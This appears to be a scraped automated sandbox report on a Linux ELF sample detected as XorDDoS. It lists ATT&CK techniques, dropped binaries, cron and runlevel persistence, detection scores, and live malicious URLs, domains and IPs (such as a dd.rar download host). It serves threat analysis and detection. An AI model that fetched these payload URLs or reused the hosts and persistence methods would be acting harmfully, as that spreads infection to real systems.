        Valid Accounts2
        Scripting
        1
        Systemd Service
        1
        Systemd Service
        12
        Masquerading
        OS Credential Dumping1
        Security Software Discovery
        Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
        Encrypted Channel
        Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default Accounts2
        At (Linux)
        2
        At (Linux)
        2
        At (Linux)
        2
        Scripting
        LSASS Memory2
        System Information Discovery
        Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
        Non-Standard Port
        Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
        File Deletion
        Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
        Non-Application Layer Protocol
        Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled Transfer3
        Application Layer Protocol
        SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size Limits1
        Ingress Tool Transfer
        Manipulate Device CommunicationManipulate App Store Rankings or Ratings
        {"C2 list": []}
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Number of created Files
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1332894 Sample: 1.elf Startdate: 26/10/2023 Architecture: LINUX Score: 100 72 www1.gggatat456.com 142.0.138.41, 43268, 80 PEGTECHINCUS United States 2->72 74 142.0.138.44, 1525, 46986 PEGTECHINCUS United States 2->74 76 7 other IPs or domains 2->76 78 Snort IDS alert for network traffic 2->78 80 Found malware configuration 2->80 82 Malicious sample detected (through community Yara rule) 2->82 84 6 other signatures 2->84 10 1.elf 2->10         started        12 systemd snapd-env-generator 2->12         started        signatures3 process4 process5 14 1.elf 10->14         started        file6 64 /usr/lib/libudev.so, ELF 14->64 dropped 66 /usr/bin/wxysocrflf, ELF 14->66 dropped 68 /usr/bin/vlteqhfomz, ELF 14->68 dropped 70 13 other malicious files 14->70 dropped 92 Drops files in suspicious directories 14->92 94 Sample deletes itself 14->94 96 Sample tries to persist itself using cron 14->96 98 Sample tries to persist itself using System V runlevels 14->98 18 1.elf sh 14->18         started        22 1.elf 14->22         started        24 1.elf 14->24         started        26 110 other processes 14->26 signatures7 process8 file9 62 /etc/crontab, ASCII 18->62 dropped 86 Sample tries to persist itself using cron 18->86 28 sh sed 18->28         started        31 1.elf ccxfvtbhgr 22->31         started        33 1.elf ccxfvtbhgr 24->33         started        35 1.elf ccxfvtbhgr 26->35         started        37 1.elf ccxfvtbhgr 26->37         started        39 1.elf ccxfvtbhgr 26->39         started        41 107 other processes 26->41 signatures10 process11 signatures12 90 Sample tries to persist itself using cron 28->90 43 ccxfvtbhgr 31->43         started        46 ccxfvtbhgr 33->46         started        48 ccxfvtbhgr 35->48         started        50 ccxfvtbhgr 37->50         started        52 ccxfvtbhgr 39->52         started        54 ezztyrfjzf 41->54         started        56 ezztyrfjzf 41->56         started        58 ezztyrfjzf 41->58         started        60 103 other processes 41->60 process13 signatures14 88 Sample deletes itself 43->88

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        1.elf87%ReversingLabsLinux.Network.XorDDoS
        1.elf100%AviraLINUX/Xorddos.cona
        1.elf100%Joe Sandbox ML
        SourceDetectionScannerLabelLink
        /usr/bin/vlteqhfomz100%AviraLINUX/Xorddos.cona
        /usr/bin/lkzqkklpfr100%AviraLINUX/Xorddos.cona
        /usr/bin/vapcvdizxx100%AviraLINUX/Xorddos.cona
        /usr/bin/wxysocrflf100%AviraLINUX/Xorddos.cona
        /usr/bin/uaewjndswe100%AviraLINUX/Xorddos.cona
        /usr/lib/libudev.so100%AviraLINUX/Xorddos.cona
        /usr/bin/efgdvbpuxx100%AviraLINUX/Xorddos.cona
        /usr/bin/nxattrsdxm100%AviraLINUX/Xorddos.cona
        /usr/bin/dyuvutukki100%AviraLINUX/Xorddos.cona
        /usr/bin/ezztyrfjzf100%AviraLINUX/Xorddos.cona
        /usr/bin/bjhrrojebv100%AviraLINUX/Xorddos.cona
        /usr/bin/ccxfvtbhgr100%AviraLINUX/Xorddos.cona
        /usr/bin/ssrfvzfvpk100%AviraLINUX/Xorddos.cona
        /usr/bin/cpbnjarskl100%AviraLINUX/Xorddos.cona
        /usr/bin/vlteqhfomz100%Joe Sandbox ML
        /usr/bin/lkzqkklpfr100%Joe Sandbox ML
        /usr/bin/vapcvdizxx100%Joe Sandbox ML
        /usr/bin/wxysocrflf100%Joe Sandbox ML
        /usr/bin/uaewjndswe100%Joe Sandbox ML
        /usr/lib/libudev.so100%Joe Sandbox ML
        /usr/bin/efgdvbpuxx100%Joe Sandbox ML
        /usr/bin/nxattrsdxm100%Joe Sandbox ML
        /usr/bin/dyuvutukki100%Joe Sandbox ML
        /usr/bin/ezztyrfjzf100%Joe Sandbox ML
        /usr/bin/bjhrrojebv100%Joe Sandbox ML
        /usr/bin/ccxfvtbhgr100%Joe Sandbox ML
        /usr/bin/ssrfvzfvpk100%Joe Sandbox ML
        /usr/bin/cpbnjarskl100%Joe Sandbox ML
        /etc/cron.hourly/gcc.sh28%ReversingLabsLinux.Trojan.XorDDoS
        /usr/bin/ssrfvzfvpk78%ReversingLabsLinux.Network.XorDDoS
        /usr/lib/libudev.so87%ReversingLabsLinux.Network.XorDDoS
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9gv100%Avira URL Cloudmalware
        http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9ua100%Avira URL Cloudmalware
        http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9dy100%Avira URL Cloudmalware
        http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9nx100%Avira URL Cloudmalware
        http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9ct100%Avira URL Cloudmalware
        http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9vl100%Avira URL Cloudmalware
        http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9va100%Avira URL Cloudmalware
        http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9bj100%Avira URL Cloudmalware
        http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9ez100%Avira URL Cloudmalware
        http://www1.gggatat456.com/dd.rar100%Avira URL Cloudmalware
        http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9wx100%Avira URL Cloudmalware
        http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9ef100%Avira URL Cloudmalware
        http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9ss100%Avira URL Cloudmalware
        http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9cc100%Avira URL Cloudmalware
        http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9cp100%Avira URL Cloudmalware
        http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9gg100%Avira URL Cloudmalware
        http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9lk100%Avira URL Cloudmalware
        http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9bh100%Avira URL Cloudmalware
        http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9/t100%Avira URL Cloudmalware
        NameIPActiveMaliciousAntivirus DetectionReputation
        ppp.gggatat456.com
        142.4.106.74
        truefalse
          unknown
          p5.lpjulidny7.com
          34.98.99.30
          truefalse
            unknown
            www1.gggatat456.com
            142.0.138.41
            truetrue
              unknown
              ppp.xxxatat456.com
              192.74.236.35
              truefalse
                unknown
                p5.dddgata789.com
                unknown
                unknowntrue
                  unknown
                  NameMaliciousAntivirus DetectionReputation
                  http://www1.gggatat456.com/dd.rartrue
                  • Avira URL Cloud: malware
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9gv1.elf, 6542.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6545.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9ct1.elf, 6505.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6508.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6510.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6513.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6516.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9vl1.elf, 6436.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6439.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6441.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6444.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6447.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9dy1.elf, 6274.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6277.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6279.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6282.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6285.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9ez1.elf, 6257.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6260.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6263.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6265.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6268.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9bj1.elf, 6419.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6422.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6424.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6427.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6430.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  http://www.gnu.org/software/libc/bugs.html1.elf, vlteqhfomz.11.dr, lkzqkklpfr.11.dr, vapcvdizxx.11.dr, wxysocrflf.11.dr, uaewjndswe.11.dr, libudev.so.11.dr, efgdvbpuxx.11.dr, nxattrsdxm.11.dr, dyuvutukki.11.dr, ezztyrfjzf.11.dr, bjhrrojebv.11.dr, ccxfvtbhgr.11.dr, ssrfvzfvpk.11.dr, cpbnjarskl.11.drfalse
                    high
                    http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9nx1.elf, 6402.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6405.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6408.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6411.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6414.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9ua1.elf, 6363.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6366.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6368.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6371.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6374.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9va1.elf, 6312.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6315.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6317.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6320.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6323.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9cp1.elf, 6346.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6349.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6351.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6354.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6357.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9cc1.elf, 6238.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6241.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6244.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6246.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6249.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9gg1.elf, 6524.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6527.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6529.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6533.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6535.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9ss1.elf, 6470.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6473.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6475.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6478.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6482.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9lk1.elf, 6329.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6332.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6335.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6337.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6340.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9ef1.elf, 6382.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6385.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6388.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6390.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6393.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9wx1.elf, 6453.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6456.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6458.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6461.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6464.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9bh1.elf, 6488.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6491.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6494.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6496.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6499.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9/t1.elf, 6204.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6206.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6207.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6208.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    192.74.236.35
                    ppp.xxxatat456.comUnited States
                    54600PEGTECHINCUSfalse
                    142.4.106.74
                    ppp.gggatat456.comUnited States
                    54600PEGTECHINCUSfalse
                    142.0.138.44
                    unknownUnited States
                    54600PEGTECHINCUStrue
                    142.0.138.41
                    www1.gggatat456.comUnited States
                    54600PEGTECHINCUStrue
                    34.98.99.30
                    p5.lpjulidny7.comUnited States
                    15169GOOGLEUSfalse
                    109.202.202.202
                    unknownSwitzerland
                    13030INIT7CHfalse
                    91.189.91.43
                    unknownUnited Kingdom
                    41231CANONICAL-ASGBfalse
                    91.189.91.42
                    unknownUnited Kingdom
                    41231CANONICAL-ASGBfalse
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    109.202.202.202AGUpU2AUqL.elfGet hashmaliciousMiraiBrowse
                      phantom.arm7.elfGet hashmaliciousUnknownBrowse
                        Josho.arm5.elfGet hashmaliciousUnknownBrowse
                          qO3Aq40KCB.elfGet hashmaliciousMirai, MoobotBrowse
                            pi5zwdO9u3.elfGet hashmaliciousMirai, MoobotBrowse
                              x86.n.elfGet hashmaliciousMirai, MoobotBrowse
                                x8.n.elfGet hashmaliciousMirai, MoobotBrowse
                                  RqjCqeOaWF.elfGet hashmaliciousMiraiBrowse
                                    UHx7w4YliZ.elfGet hashmaliciousMiraiBrowse
                                      2U85a2FpDJ.elfGet hashmaliciousMiraiBrowse
                                        NYzt5Ms8RU.elfGet hashmaliciousMiraiBrowse
                                          X19ScaRqDU.elfGet hashmaliciousUnknownBrowse
                                            7qnWvWY2wV.elfGet hashmaliciousUnknownBrowse
                                              FzpdcKlWfd.elfGet hashmaliciousGafgytBrowse
                                                sora.arm7.elfGet hashmaliciousMiraiBrowse
                                                  KG0KrlsQOu.elfGet hashmaliciousUnknownBrowse
                                                    2ZVHXp1ghj.elfGet hashmaliciousUnknownBrowse
                                                      itsoeasy.elfGet hashmaliciousItsSoEasyBrowse
                                                        dp6sySM2Qm.elfGet hashmaliciousMiraiBrowse
                                                          Aqua.x86.elfGet hashmaliciousUnknownBrowse
                                                            91.189.91.43AGUpU2AUqL.elfGet hashmaliciousMiraiBrowse
                                                              phantom.arm7.elfGet hashmaliciousUnknownBrowse
                                                                Josho.arm5.elfGet hashmaliciousUnknownBrowse
                                                                  qO3Aq40KCB.elfGet hashmaliciousMirai, MoobotBrowse
                                                                    pi5zwdO9u3.elfGet hashmaliciousMirai, MoobotBrowse
                                                                      x86.n.elfGet hashmaliciousMirai, MoobotBrowse
                                                                        x8.n.elfGet hashmaliciousMirai, MoobotBrowse
                                                                          RqjCqeOaWF.elfGet hashmaliciousMiraiBrowse
                                                                            UHx7w4YliZ.elfGet hashmaliciousMiraiBrowse
                                                                              2U85a2FpDJ.elfGet hashmaliciousMiraiBrowse
                                                                                NYzt5Ms8RU.elfGet hashmaliciousMiraiBrowse
                                                                                  X19ScaRqDU.elfGet hashmaliciousUnknownBrowse
                                                                                    7qnWvWY2wV.elfGet hashmaliciousUnknownBrowse
                                                                                      FzpdcKlWfd.elfGet hashmaliciousGafgytBrowse
                                                                                        sora.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                          KG0KrlsQOu.elfGet hashmaliciousUnknownBrowse
                                                                                            2ZVHXp1ghj.elfGet hashmaliciousUnknownBrowse
                                                                                              itsoeasy.elfGet hashmaliciousItsSoEasyBrowse
                                                                                                dp6sySM2Qm.elfGet hashmaliciousMiraiBrowse
                                                                                                  Aqua.x86.elfGet hashmaliciousUnknownBrowse
                                                                                                    91.189.91.42AGUpU2AUqL.elfGet hashmaliciousMiraiBrowse
                                                                                                      phantom.arm7.elfGet hashmaliciousUnknownBrowse
                                                                                                        Josho.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                          qO3Aq40KCB.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                            pi5zwdO9u3.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                              x86.n.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                x8.n.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                  RqjCqeOaWF.elfGet hashmaliciousMiraiBrowse
                                                                                                                    UHx7w4YliZ.elfGet hashmaliciousMiraiBrowse
                                                                                                                      2U85a2FpDJ.elfGet hashmaliciousMiraiBrowse
                                                                                                                        NYzt5Ms8RU.elfGet hashmaliciousMiraiBrowse
                                                                                                                          X19ScaRqDU.elfGet hashmaliciousUnknownBrowse
                                                                                                                            7qnWvWY2wV.elfGet hashmaliciousUnknownBrowse
                                                                                                                              FzpdcKlWfd.elfGet hashmaliciousGafgytBrowse
                                                                                                                                sora.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                  KG0KrlsQOu.elfGet hashmaliciousUnknownBrowse
                                                                                                                                    2ZVHXp1ghj.elfGet hashmaliciousUnknownBrowse
                                                                                                                                      itsoeasy.elfGet hashmaliciousItsSoEasyBrowse
                                                                                                                                        dp6sySM2Qm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                          Aqua.x86.elfGet hashmaliciousUnknownBrowse
                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                            ppp.xxxatat456.comdkuidbsedpGet hashmaliciousXorDDoSBrowse
                                                                                                                                            • 46.105.84.190
                                                                                                                                            libudev.soGet hashmaliciousXorDDoSBrowse
                                                                                                                                            • 54.36.15.96
                                                                                                                                            0Xorddos.oGet hashmaliciousXorDDoSBrowse
                                                                                                                                            • 79.137.1.132
                                                                                                                                            libudev.soGet hashmaliciousBrowse
                                                                                                                                            • 151.80.176.165
                                                                                                                                            ppp.gggatat456.comiJl2Sb6qRaGet hashmaliciousXorDDoSBrowse
                                                                                                                                            • 54.36.145.106
                                                                                                                                            Di1p3oLnDb.elfGet hashmaliciousXorDDoSBrowse
                                                                                                                                            • 79.137.1.133
                                                                                                                                            xor1.oGet hashmaliciousXorDDoSBrowse
                                                                                                                                            • 176.31.91.137
                                                                                                                                            0Xorddos.oGet hashmaliciousXorDDoSBrowse
                                                                                                                                            • 54.36.145.106
                                                                                                                                            XZFWLZVF1ZGet hashmaliciousXorDDoSBrowse
                                                                                                                                            • 54.36.15.99
                                                                                                                                            CD2uXlYGfaGet hashmaliciousXorDDoSBrowse
                                                                                                                                            • 51.68.183.111
                                                                                                                                            7ZDbt9EUgmGet hashmaliciousXorDDoSBrowse
                                                                                                                                            • 51.89.70.85
                                                                                                                                            ygljglkjgfg0Get hashmaliciousXorDDoSBrowse
                                                                                                                                            • 51.89.52.13
                                                                                                                                            www1.gggatat456.comdkuidbsedpGet hashmaliciousXorDDoSBrowse
                                                                                                                                            • 54.36.15.99
                                                                                                                                            libudev.soGet hashmaliciousXorDDoSBrowse
                                                                                                                                            • 54.36.15.99
                                                                                                                                            xor1.oGet hashmaliciousXorDDoSBrowse
                                                                                                                                            • 54.36.15.99
                                                                                                                                            0Xorddos.oGet hashmaliciousXorDDoSBrowse
                                                                                                                                            • 54.36.15.99
                                                                                                                                            http://www1.gggatat456.com/dd.rarGet hashmaliciousUnknownBrowse
                                                                                                                                            • 51.68.183.108
                                                                                                                                            w.txtGet hashmaliciousBrowse
                                                                                                                                            • 92.222.83.172
                                                                                                                                            w.txtGet hashmaliciousBrowse
                                                                                                                                            • 92.222.83.172
                                                                                                                                            1433.binGet hashmaliciousBrowse
                                                                                                                                            • 91.134.134.116
                                                                                                                                            libudev.soGet hashmaliciousBrowse
                                                                                                                                            • 91.134.134.116
                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                            PEGTECHINCUS#U00f6deme_talimat#U0131.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • 142.4.119.230
                                                                                                                                            b3astmode.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                            • 154.84.242.243
                                                                                                                                            arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                            • 156.247.76.124
                                                                                                                                            sOmYWENS1I.elfGet hashmaliciousMiraiBrowse
                                                                                                                                            • 107.149.44.149
                                                                                                                                            m7MeI7tiks.elfGet hashmaliciousMiraiBrowse
                                                                                                                                            • 156.247.76.128
                                                                                                                                            https://www.smbc.acctenet.info/Get hashmaliciousUnknownBrowse
                                                                                                                                            • 108.186.251.186
                                                                                                                                            7c912KO5XC.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                                                            • 107.148.223.82
                                                                                                                                            Overdue_payment_settled.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • 142.4.119.230
                                                                                                                                            Orden_de_compra.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • 108.186.24.219
                                                                                                                                            Hgh7WMRLzKPX09P.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • 142.4.119.230
                                                                                                                                            hesaphareketi-01.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • 107.148.95.217
                                                                                                                                            doc_20232407993001901.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • 107.148.95.217
                                                                                                                                            e-dekont.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                                                            • 142.4.119.230
                                                                                                                                            EOQvIhNLzI.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                                                            • 107.148.223.82
                                                                                                                                            9OXb5VhqNL.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                                                            • 154.195.80.66
